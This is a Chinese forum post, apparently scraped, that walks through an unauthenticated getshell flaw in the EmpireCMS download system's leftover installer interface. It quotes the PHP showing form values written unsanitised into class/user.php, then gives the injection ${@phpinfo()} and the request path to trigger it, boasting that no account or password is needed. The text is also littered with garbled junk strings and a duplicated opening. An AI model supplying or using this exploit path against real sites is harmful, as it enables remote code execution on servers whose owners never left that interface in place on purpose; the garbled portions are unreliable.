这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们% c) C1 s% v# E: W
3 U; x1 p& N" y- s5 \! F
; `' `" b4 s% b
这是帝国的一套下载系统 如图
$ R& r! D1 o" O5 ^ps(不需要任何账户和密码,直接写shell) M3 U6 j/ e. l0 C& T
由于很多站是由于下载要整合discuz 等等一些论坛..... g* z v+ n/ C+ q2 J4 W
6 G: x8 ^2 C- a* g; X- H- {
而帝国他又有一个万能接口,如图
' m0 a6 L+ E* H3 Q& O/ r5 {! B5 a2 { K1 s
3 s1 H! m: {' Z+ j4 h而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码. X* X, t/ G# b* F8 b
3 V0 h$ H9 [1 _$ D, ?0 h+ U当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪; {1 h9 a: `0 f K* }. {$ c+ \4 j
( T$ M# ?2 A5 d在data/fun.php中的15行
/ O$ `. J$ }7 `
9 R, A, [5 g; I9 A我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {
% E7 {% ]+ f. W0 G17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干
: C9 y& o' ]0 j
+ A7 c: A! k( j4 z6 H% `这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
. [+ P+ y# m% C* J& \" Y) V3 a- z: ^/ T2 w$ `. h) n7 r1 ?6 T5 [( v
他将传进来的变量进行了切割,然后赋给了$filetext4 |4 Y! K6 q: F7 T
U- J6 z. d' `9 d, U+ y
然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了
6 }. M. b, F! ?1 ]7 h0 N8 C- s8 f
* }3 c y0 p" ]4 L我们看看写入的结果,随便填一个
4 W0 y3 h& _0 _6 T
! g: m& Z" L1 [0 X$ P9 }
& K# E1 R6 i( {. ^
1 ]" `* P3 }7 {$ I G$ q/ a! P1 ?) a$ B5 O
7 G5 U: `: |8 j3 ~# `9 o6 k
2 j6 n2 S8 N; k( b! U; C' h" Q9 Q6 W& G
) m" q# J) q7 A1 v
) n' p7 E1 I$ h: Q
; K" o; H+ v( ?% p1 |) r, u
+ n( K# S; n3 W$ b y' I# t
( v0 G1 J- g( R; U) G8 w& Y4 }, W$ B* ]% S! N" e& G
/ N+ M3 ^. U: x" R/ S! A
# Y, _+ J+ v1 Y% p! P3 }# z
9 p0 N0 P7 o2 U4 F+ t4 z1 ^' G/ D. B( w, y
0 ?0 p2 J a9 u4 U
7 z% R# X2 `, g# V) ^4 ]8 |0 x* C7 w
- c/ f0 e+ ]) N% O
所以我们淫荡点,写个${@phpinfo()}试试
# {. s1 Y, ?4 l5 n. y& A然后访问以下class/user.php这个文件/ q: W+ R7 t. A# p" O! n
日了吧 ' T" l$ V. B% h! R& [; S7 y$ e
7 L: G" j# l1 r7 G% C5 G7 z) C
2 q% Q" P# `# D! i. t5 q C! b+ }& c
7 ]8 V1 g7 N0 y) {8 ?( |1 N3 D
& k1 G2 e8 J! s' }3 Q: s: U! e |